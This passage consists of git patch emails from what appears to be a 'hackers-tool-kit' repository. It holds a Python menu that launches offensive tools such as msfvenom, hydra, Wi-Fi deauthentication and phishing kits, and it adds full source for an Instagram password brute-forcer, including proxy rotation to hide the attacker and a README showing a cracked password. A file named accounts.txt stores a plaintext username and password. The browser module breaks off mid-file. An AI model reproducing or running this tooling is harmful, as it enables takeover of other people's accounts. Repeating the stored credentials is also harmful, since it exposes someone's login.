/root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From b7d33323cbeb342b5c3f515e995226e99e7bfa6d Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 30 Jun 2019 06:01:59 +0100 Subject: [PATCH 181/214] Add files via upload --- tools/venombanner.txt | 43 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 tools/venombanner.txt diff --git a/tools/venombanner.txt b/tools/venombanner.txt new file mode 100644 index 0000000..fc3019b --- /dev/null +++ b/tools/venombanner.txt @@ -0,0 +1,43 @@ +------------------------------------------------------------------ + .o@*hu + .. ......... .u*" ^Rc + oP""*Lo*#"""""""""""7d" .d*N. $ + @ u@"" .u*" o*" #L ?b + @ " " .d" .d@@e$ ?b. + 8 @*@me@# '"Nu + @ '#b + .P $r + .@" $L $ + .@" 8"R dP + .d#" .dP d" .d# + xP .e .ud#" dE.o@"( + $ s*" .u@*"" '""\dP" + ?L .. ..o@"" .$ uP + #c:$"*u. .u@*""$ uR .@" + ?L$. '"""***Nc x@"" @" d" JP + ^#$. #L .$ 8" d" d" + ' "b.'$. @" $" 8" + '"*@$L $" $ @ + @L $" d" 8\ + $$u.u$" dF dF + $ """ o dP xR + $ dFNu...@" $ + "N.. ?B ^""" :R + """"* RL d> + "$u. .$ + ^"*bo@" + + + ██▒ █▓▓█████ ███▄ █ ▒█████ ███▄ ▄███▓ + ▓██░ █▒▓█ ▀ ██ ▀█ █ ▒██▒ ██▒▓██▒▀█▀ ██▒ + ▓██ █▒░▒███ ▓██ ▀█ ██▒▒██░ ██▒▓██ ▓██░ + ▒██ █░░▒▓█ ▄ ▓██▒ ▐▌██▒▒██ ██░▒██ ▒██ + ▒▀█░ ░▒████▒▒██░ ▓██░░ ████▓▒░▒██▒ ░██▒ + ░ ▐░ ░░ ▒░ ░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▒░ ░ ░ + ░ ░░ ░ ░ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ░ ░ ░ + ░░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ + ░ ░ ░ ░ ░ ░ ░ + ░ +------------------------------------------------------------------ +| Created by @tuf_unkn0wn type ? for help | +------------------------------------------------------------------ From 1482407e34e01a53f335d6aa6c77e5b113afc2d3 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 23 Aug 2019 02:12:44 -0400 Subject: [PATCH 182/214] Update install.py --- install.py | 1 + 1 file changed, 1 insertion(+) diff --git a/install.py b/install.py index 7cc82be..c3d596d 100644 --- a/install.py +++ b/install.py @@ -9,6 +9,7 @@ def install(): os.system("apt install macchanger -y") os.system("apt install wafw00f -y") os.system("apt install medusa -y") + os.system("cd /root/hackers-tool-kit/tools && git clone https://github.com/Pure-L0G1C/Instagram") os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") os.system("cd /root && git clone https://github.com/1N3/BruteX") os.system("cd /root/BruteX && ./install.sh") From 6697038891a7747ad341da4909ad08e14805b665 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 23 Aug 2019 02:13:15 -0400 Subject: [PATCH 183/214] Delete instagram.py --- tools/instagram.py | 61 ---------------------------------------------- 1 file changed, 61 deletions(-) delete mode 100644 tools/instagram.py diff --git a/tools/instagram.py b/tools/instagram.py deleted file mode 100644 index 2eee1cc..0000000 --- a/tools/instagram.py +++ /dev/null @@ -1,61 +0,0 @@ -# Date: 05/05/2018 -# Author: Pure-L0G1C -# Description: Bruteforce Instagram - -from time import sleep -from os.path import exists -from sys import exit, version -from lib.bruter import Bruter -from lib.session import Session -from argparse import ArgumentParser - -def _input(msg): - return raw_input(msg).lower() if int(version.split()[0].split('.')[0]) == 2 else input(msg).lower() - -def main(): - - # assign arugments - args = ArgumentParser() - args.add_argument('username', help='email or username') - args.add_argument('wordlist', help='password list') - args.add_argument('threads', help='password per seconds. Any number <= 16') - args = args.parse_args() - - if not exists(args.wordlist): - exit('[!] Unable to locate `{}`'.format(args.wordlist)) - - if not args.threads.isdigit(): - exit('[!] Threads must be a number') - - # assign variables - engine = Bruter(args.username.title(), int(args.threads), args.wordlist) - session = Session(args.username.title(), args.wordlist) - - if session.exists(): - if _input('Do you want to resume the attack? [y/n]: ').split()[0][0] == 'y': - data = session.read() - if data: - engine.attempts = int(data['attempts']) - engine.passlist.queue = eval(data['queue']) - engine.retrieve = True - - # start attack - try: - engine.start() - except KeyboardInterrupt: - engine.user_abort = True - finally: - if all([engine.spyder.proxy_info, not engine.isFound]): - engine.display(engine.pwd) - - if all([not engine.read, engine.user_abort, not engine.isFound]): - print('{}[!] Exiting ...'.format('' if not engine.spyder.proxy_info else '\n')) - - if all([engine.read, not engine.isFound]): - print('\n[*] Password not found') - - sleep(1.5) - engine.stop() - -if __name__ == '__main__': - main() \ No newline at end of file From 2f0ccc1818071a8b7ad157ca543577a15e4c108e Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 23 Aug 2019 02:23:54 -0400 Subject: [PATCH 184/214] Update htk.py --- htk.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/htk.py b/htk.py index 32bf6b6..a133256 100644 --- a/htk.py +++ b/htk.py @@ -2,7 +2,7 @@ # coding: latin-1 #if you use this code give me credit @tuf_unkn0wn #i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali +#to ask questions or report a problem message me on instagram @tuf_unkn0wn """ @@ -1000,8 +1000,9 @@ def port(): def insta(): insta = raw_input("USERNAME> ") jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("MODE> ") + ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} {2}'.format(insta,jl,k) os.system(ma) #------------------------# #INSTAGRAM BRUTEFORCE END# From 638a110e0ad13978405b377a519813d651d5b4e6 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 23 Aug 2019 02:27:41 -0400 Subject: [PATCH 185/214] Update install.py --- install.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/install.py b/install.py index c3d596d..2f84565 100644 --- a/install.py +++ b/install.py @@ -9,12 +9,11 @@ def install(): os.system("apt install macchanger -y") os.system("apt install wafw00f -y") os.system("apt install medusa -y") - os.system("cd /root/hackers-tool-kit/tools && git clone https://github.com/Pure-L0G1C/Instagram") os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") os.system("cd /root && git clone https://github.com/1N3/BruteX") os.system("cd /root/BruteX && ./install.sh") os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") + os.system("pip install future mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") os.system("pip install whois") os.system("pip install builtwith") From ec6d02ed75a1c83617962dd4a7774c6c8ec0daeb Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 23 Aug 2019 02:56:33 -0400 Subject: [PATCH 186/214] Add files via upload --- tools/Instagram/requirements.txt | 4 + tools/Instagram/test_proxies.py | 138 +++++++++++++++++++++++++++++++ 2 files changed, 142 insertions(+) create mode 100644 tools/Instagram/requirements.txt create mode 100644 tools/Instagram/test_proxies.py diff --git a/tools/Instagram/requirements.txt b/tools/Instagram/requirements.txt new file mode 100644 index 0000000..d86bc64 --- /dev/null +++ b/tools/Instagram/requirements.txt @@ -0,0 +1,4 @@ +bs4 +future +requests +colorama diff --git a/tools/Instagram/test_proxies.py b/tools/Instagram/test_proxies.py new file mode 100644 index 0000000..bc95120 --- /dev/null +++ b/tools/Instagram/test_proxies.py @@ -0,0 +1,138 @@ +''' +Date: 3/15/2019 +Author: Mohamed +Description: Reads a file that contains a list of proxies and determines whether or not that list is good. + Each line in the file must be in the format of ip:port +''' + +import platform +from os import system +from time import sleep +from requests import Session +from threading import Thread, RLock + +proxy_list = 'proxies.txt' +target_site = 'https://instagram.com' + + +def get_proxies(): + proxies = [] + + with open(proxy_list, 'rt', encoding='utf-8') as proxies_file: + + for line in proxies_file: + if not line: + continue + + ip, port = line.replace('\r', '').split(':') + + port = int(port) + proxy = {'ip': ip, 'port': port} + proxies.append(proxy) + + return proxies + + +class TestProxies: + + def __init__(self, proxies): + self.worked = 0 + self.failed = 0 + self.lock = RLock() + self.active_brs = 0 + self.is_alive = True + self.proxies = proxies + self.total = len(proxies) + self.test_link = target_site + + def display(self): + system('cls' if platform.system() == 'Windows' else 'clear') + worked, failed, total = self.worked, self.failed, self.total + + worked_per = round((worked/total) * 100, 2) + failed_per = round((failed/total) * 100, 2) + complete = round(worked_per + failed_per, 2) + + print(f'Complete: {complete}%') + print(f'Active browsers: {self.active_brs}') + print(f'Proxies worked: {worked_per}% [{worked}]') + print(f'Proxies failed: {failed_per}% [{failed}]') + + def test_proxy(self, proxy): + br = Session() + + addr = '{}:{}'.format(proxy['ip'], proxy['port']) + addr = {'http': addr, 'https': addr} + br.proxies.update(addr) + + try: + br.get(self.test_link, timeout=(10, 15)) + + with self.lock: + self.worked += 1 + except: + with self.lock: + self.failed += 1 + finally: + br.close() + + if self.is_alive: + with self.lock: + self.display() + + self.active_brs -= 1 + + def start(self): + for proxy in self.proxies: + + while self.is_alive and self.active_brs >= 512: + pass + + if not self.is_alive: + break + + with self.lock: + self.active_brs += 1 + + Thread(target=self.test_proxy, args=[proxy], daemon=True).start() + + while self.is_alive and self.active_brs: + sleep(0.5) + + self.display() + + def stop(self): + self.is_alive = False + + while self.active_brs: + try: + with self.lock: + self.display() + + sleep(0.5) + except KeyboardInterrupt: + break + + def examine(self): + failed = self.failed / self.total + worked = self.worked / self.total + + if worked == 0: + print('Bad proxy list') + elif (failed - worked) >= 0.1: + print('Bad proxy list') + elif (failed - worked) == 0: + print('Bad proxy list') + else: + print('Good proxy list') + + +if __name__ == '__main__': + test_proxies = TestProxies(get_proxies()) + + try: + test_proxies.start() + except KeyboardInterrupt: + test_proxies.stop() + finally: + test_proxies.examine() From 3efe52f5f431fbbb4a927e2c07f486a754312997 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 23 Aug 2019 02:58:44 -0400 Subject: [PATCH 187/214] Add files via upload --- tools/Instagram/Executable/instagram.py | 149 ++++++++++++++++++++++++ tools/Instagram/LICENSE | 21 ++++ tools/Instagram/README.md | 124 ++++++++++++++++++++ tools/Instagram/accounts.txt | 6 + tools/Instagram/instagram.py | 132 +++++++++++++++++++++ 5 files changed, 432 insertions(+) create mode 100644 tools/Instagram/Executable/instagram.py create mode 100644 tools/Instagram/LICENSE create mode 100644 tools/Instagram/README.md create mode 100644 tools/Instagram/accounts.txt create mode 100644 tools/Instagram/instagram.py diff --git a/tools/Instagram/Executable/instagram.py b/tools/Instagram/Executable/instagram.py new file mode 100644 index 0000000..b953c68 --- /dev/null +++ b/tools/Instagram/Executable/instagram.py @@ -0,0 +1,149 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Instagram bruter + +from sys import exit +from os.path import exists +from lib.bruter import Bruter +from lib.display import Display +from lib.const import credentials, modes + + +class Engine(object): + + def __init__(self, username, threads, passlist_path): + self.bruter = None + self.resume = False + self.is_alive = True + self.threads = threads + self.username = username + self.display = Display() + self.passlist_path = passlist_path + + def create_bruter(self): + self.bruter = Bruter(self.username, self.threads, + self.passlist_path) + + def get_user_resp(self): + return self.display.prompt('Would you like to resume the attack? [y/n]: ') + + def write_to_file(self, password): + with open(credentials, 'at') as f: + data = 'Username: {}\nPassword: {}\n\n'.format( + self.username.title(), password) + f.write(data) + + def start(self): + + self.create_bruter() + + while self.is_alive and not self.bruter.password_manager.session: + pass + + if not self.is_alive: + return + + if self.bruter.password_manager.session.exists: + try: + resp = self.get_user_resp() + except: + self.is_alive = False + + if resp and self.is_alive: + if resp.strip().lower() == 'y': + self.bruter.password_manager.resume = True + + try: + self.bruter.start() + except KeyboardInterrupt: + self.bruter.stop() + self.bruter.display.shutdown(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + finally: + self.stop() + + def stop(self): + if self.is_alive: + + self.bruter.stop() + self.is_alive = False + + if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: + self.bruter.display.stats_not_found(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + if self.bruter.is_found: + self.write_to_file(self.bruter.password) + self.bruter.display.stats_found(self.bruter.password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + +def args(): + enable_colors = str(input('Enable colors? (default: y) [y/n]: ')) + + if not enable_colors: + enable_colors = True + else: + if enable_colors[0].lower() == 'n': + enable_colors = False + + display = Display(is_color=enable_colors) + username = display.prompt('Enter a username: ') + + if not username: + display.warning('You can\'t leave this field empty') + display.wait() + exit() + + passlist = display.prompt('Enter the path to your password list: ') + + if not exists(passlist): + display.warning('Invalid path to password list', False) + display.wait() + exit() + + display.info('''Modes:\r + 0: => 512 passwords at a time + 1: => 256 passwords at a time + 2: => 128 passwords at a time + 3: => 64 passwords at a time + ''', False) + + mode = display.prompt('Select a mode [0, 1, 2, 3]: ', False) + + if not mode.isdigit(): + display.warning('Mode must be a number', False) + display.wait() + exit() + + mode = int(mode) + + if int(mode) > 3: + display.warning('Mode must be no more than 3', False) + display.wait() + exit() + + if int(mode) < 0: + display.warning('Mode must bot no less than 0', False) + display.wait() + exit() + + return [username, passlist, mode] + + +if __name__ == '__main__': + try: + user_input = args() + except KeyboardInterrupt: + exit() + + display = Display() + username, passlist, mode = user_input + + try: + Engine(username, modes[mode], passlist).start() + except: + pass + finally: + display.wait() + exit() diff --git a/tools/Instagram/LICENSE b/tools/Instagram/LICENSE new file mode 100644 index 0000000..f9d08a3 --- /dev/null +++ b/tools/Instagram/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2018 Mohamed + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/tools/Instagram/README.md b/tools/Instagram/README.md new file mode 100644 index 0000000..51aff58 --- /dev/null +++ b/tools/Instagram/README.md @@ -0,0 +1,124 @@ +# Instagram Bruter + +[![Version](https://img.shields.io/badge/version-v2.1.1-blue.svg)]() +[![Python](https://img.shields.io/badge/python-v3-blue.svg)]() +[![Discord](https://img.shields.io/discord/532621311017484307.svg)](https://discord.gg/jvhJMeb) +[![Donate](https://img.shields.io/badge/paypal-donate-yellow.svg)](https://www.paypal.me/Msheikh03) +
+**Bitcoin wallet:** 3Kr5C9t9HWwPfqzSNXeBNyRvJWw9sSLeKy +
+ +This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden. + +# NOTICE + +This project is no longer maintained; use version 3.0.0 at [here](https://github.com/Pure-L0G1C/Insta) + +### Requirements + +- Python _v3.x.x_ +- ~~Kali Linux 2.0~~ +- ~~TOR~~ + +### Install Dependencies + +``` +pip3 install -r requirements.txt +``` + +### Help + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h +usage: instagram.py [-h] [-m MODE] username wordlist + +positional arguments: + username email or username + wordlist password list + +optional arguments: + -h, --help show this help message and exit + -m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots +``` + +### Usage + +``` +python3 instagram.py -m +``` + +### Bots(Threads) + +- 4 bots: 64 passwords at a time +- 8 bots: 128 passwords at a time +- 16 bots: 256 passwords at a time +- 32 bots: 512 passwords at a time + +### Modes + +- 0: 32 bots +- 1: 16 bots +- 2: 8 bots +- 3: 4 bots + +### Chill mode + +This mode uses only 4 bots, or 64 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3 +``` + +### Moderate mode 1 + +This mode uses 8 bots, or 128 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2 +``` + +### Moderate mode 2 + +This mode uses 16 bots, or 256 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1 +``` + +### Savage mode + +This mode uses 32 bots, or 512 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0 +``` + +### If you don't specify a mode, then mode is set to 2 + +### Run + +``` +[-] Wordlist: pass.lst +[-] Username: Sami09.1 +[-] Password: 272 +[-] Complete: 45.51% +[-] Attempts: 228 +[-] Browsers: 273 +[-] Exists: True +``` + +### Stop + +``` +[-] Wordlist: pass.lst +[-] Username: Sami09.1 +[-] Password: Sami123 +[-] Complete: 62.67% +[-] Attempts: 314 +[-] Browsers: 185 +[-] Exists: True + +[!] Password Found +[+] Username: Sami09.1 +[+] Password: Sami123 +``` diff --git a/tools/Instagram/accounts.txt b/tools/Instagram/accounts.txt new file mode 100644 index 0000000..d9c4e02 --- /dev/null +++ b/tools/Instagram/accounts.txt @@ -0,0 +1,6 @@ +Username: Tuf_Unkn0Wn +Password: 1NST4gr4mUN_KN0WNbaliP4SS + +Username: Tuf_Unkn0Wn +Password: 1NST4gr4mUN_KN0WNbaliP4SS + diff --git a/tools/Instagram/instagram.py b/tools/Instagram/instagram.py new file mode 100644 index 0000000..2840aa8 --- /dev/null +++ b/tools/Instagram/instagram.py @@ -0,0 +1,132 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Instagram bruter + +from sys import exit +from os.path import exists +from lib.bruter import Bruter +from lib.display import Display +from platform import python_version +from lib.const import credentials, modes +from argparse import ArgumentParser, ArgumentTypeError + + +class Engine(object): + + def __init__(self, username, threads, passlist_path, is_color): + self.bruter = None + self.resume = False + self.is_alive = True + self.threads = threads + self.username = username + self.passlist_path = passlist_path + self.display = Display(is_color=is_color) + + def passlist_path_exists(self): + if not exists(self.passlist_path): + self.display.warning('Invalid path to password list') + return False + return True + + def create_bruter(self): + self.bruter = Bruter( + self.username, + self.threads, + self.passlist_path + ) + + def get_user_resp(self): + return self.display.prompt('Would you like to resume the attack? [y/n]: ') + + def write_to_file(self, password): + with open(credentials, 'at') as f: + data = 'Username: {}\nPassword: {}\n\n'.format( + self.username.title(), password) + f.write(data) + + def start(self): + if not self.passlist_path_exists(): + self.is_alive = False + + if self.is_alive: + self.create_bruter() + + while self.is_alive and not self.bruter.password_manager.session: + pass + + if not self.is_alive: + return + + if self.bruter.password_manager.session.exists: + try: + resp = self.get_user_resp() + except: + self.is_alive = False + + if resp and self.is_alive: + if resp.strip().lower() == 'y': + self.bruter.password_manager.resume = True + + try: + self.bruter.start() + except KeyboardInterrupt: + self.bruter.stop() + self.bruter.display.shutdown(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + finally: + self.stop() + + def stop(self): + if self.is_alive: + + self.bruter.stop() + self.is_alive = False + + if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: + self.bruter.display.stats_not_found(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + if self.bruter.is_found: + self.write_to_file(self.bruter.password) + self.bruter.display.stats_found(self.bruter.password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + +def valid_int(n): + if not n.isdigit(): + raise ArgumentTypeError('mode must be a number') + + n = int(n) + + if n > 3: + raise ArgumentTypeError('maximum for a mode is 3') + + if n < 0: + raise ArgumentTypeError('minimum for a mode is 0') + + return n + + +def args(): + args = ArgumentParser() + args.add_argument('username', help='email or username') + args.add_argument('passlist', help='password list') + args.add_argument('-nc', '--no-color', dest='color', + action='store_true', help='disable colors') + args.add_argument('-m', '--mode', default=2, type=valid_int, + help='modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots') + return args.parse_args() + + +if __name__ == '__main__': + + if int(python_version()[0]) < 3: + print('[!] Please use Python 3') + exit() + + arugments = args() + mode = arugments.mode + username = arugments.username + passlist = arugments.passlist + is_color = True if not arugments.color else False + Engine(username, modes[mode], passlist, is_color).start() From d4dac9289170fb30817729b244aa2b2bd0c15450 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 23 Aug 2019 03:00:18 -0400 Subject: [PATCH 188/214] Add files via upload --- tools/Instagram/database/session.db | Bin 0 -> 12288 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 tools/Instagram/database/session.db diff --git a/tools/Instagram/database/session.db b/tools/Instagram/database/session.db new file mode 100644 index 0000000000000000000000000000000000000000..52266e3e8ec72cb8f6ac022c7b83ae8c5390fe2d GIT binary patch literal 12288 zcmeI#y-ve05C`yc_*A9hE>(vt9$N__RZMK8$U+qbLF$1{QBZ>vDQy57i4|UpCt&W& zbi@W1$kdIY`k&{lkL^Q&ThRf zB8qkfO}?anw~4p;$GQg8ApijgKmY;|fB*y_009U<00RFe@Y-j4oiJo?Cnmcq^Kq_q zQO*4noFy_=QmA+^lET02HpHLM-wkOo6-wT!!&)&jCZ9bRErwT0p39_OEemaYQ?2Vd z8D7T8L|n*8_xJO?pFO>!V7C*8jEea*f6 Date: Fri, 23 Aug 2019 03:01:39 -0400 Subject: [PATCH 189/214] Add files via upload --- tools/Instagram/lib/__init__.py | 2 + tools/Instagram/lib/bad_proxies.py | 24 ++++ tools/Instagram/lib/browser.py | 127 +++++++++++++++++ tools/Instagram/lib/bruter.py | 176 ++++++++++++++++++++++++ tools/Instagram/lib/const.py | 76 ++++++++++ tools/Instagram/lib/display.py | 160 +++++++++++++++++++++ tools/Instagram/lib/password_manager.py | 108 +++++++++++++++ tools/Instagram/lib/proxy.py | 26 ++++ tools/Instagram/lib/proxy_list.py | 18 +++ tools/Instagram/lib/proxy_manager.py | 42 ++++++ tools/Instagram/lib/scraper.py | 123 +++++++++++++++++ tools/Instagram/lib/session.py | 106 ++++++++++++++ 12 files changed, 988 insertions(+) create mode 100644 tools/Instagram/lib/__init__.py create mode 100644 tools/Instagram/lib/bad_proxies.py create mode 100644 tools/Instagram/lib/browser.py create mode 100644 tools/Instagram/lib/bruter.py create mode 100644 tools/Instagram/lib/const.py create mode 100644 tools/Instagram/lib/display.py create mode 100644 tools/Instagram/lib/password_manager.py create mode 100644 tools/Instagram/lib/proxy.py create mode 100644 tools/Instagram/lib/proxy_list.py create mode 100644 tools/Instagram/lib/proxy_manager.py create mode 100644 tools/Instagram/lib/scraper.py create mode 100644 tools/Instagram/lib/session.py diff --git a/tools/Instagram/lib/__init__.py b/tools/Instagram/lib/__init__.py new file mode 100644 index 0000000..c30328c --- /dev/null +++ b/tools/Instagram/lib/__init__.py @@ -0,0 +1,2 @@ +# Date: 12/30/2018 +# Author: Mohamed diff --git a/tools/Instagram/lib/bad_proxies.py b/tools/Instagram/lib/bad_proxies.py new file mode 100644 index 0000000..d27bcbe --- /dev/null +++ b/tools/Instagram/lib/bad_proxies.py @@ -0,0 +1,24 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Manages bad proxies + +from .const import max_bad_proxies + + +class BadProxies(object): + + def __init__(self): + self.proxies = [] + + def __contains__(self, proxy): + for _proxy in self.proxies: + if _proxy.ip == proxy.ip and _proxy.port == proxy.port: + return True + return False + + def append(self, proxy): + if len(self.proxies) >= max_bad_proxies: + self.proxies.pop(0) + + self.proxies.append(proxy) + diff --git a/tools/Instagram/lib/browser.py b/tools/Instagram/lib/browser.py new file mode 100644 index 0000000..d3aefea --- /dev/null +++ b/tools/Instagram/lib/browser.py @@ -0,0 +1,127 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Browser + +from time import time +from random import choice +from requests import Session +from .const import browser_data, response_codes, fetch_time, user_agents, debug + + +class Browser(object): + + account_exists = None + + def __init__(self, username, password, proxy): + self.proxy = proxy + self.is_found = False + self.is_active = True + self.is_locked = False + self.start_time = None + self.browser = self.br() + self.username = username + self.password = password + self.is_attempted = False + + def br(self): + header = browser_data['header'] + header['user-agent'] = choice(user_agents) + + session = Session() + session.headers.update(header) + session.proxies.update(self.proxy.addr) + return session + + def get_token(self): + token = None + try: + token = self.browser.get( + browser_data['home_url'], timeout=fetch_time).cookies.get_dict()['csrftoken'] + + self.browser.headers.update({ + 'cookie': 'mid=XLzTtAALAAEb-Sz-JUGbyLphzGmc; csrftoken={}; rur={}'.format( + token, self.browser.cookies.get_dict()['rur'] + ) + }) + except: + pass + finally: + return token + + def post_data(self): + response = None + data = {browser_data['username_field']: self.username, + browser_data['password_field']: self.password} + + try: + 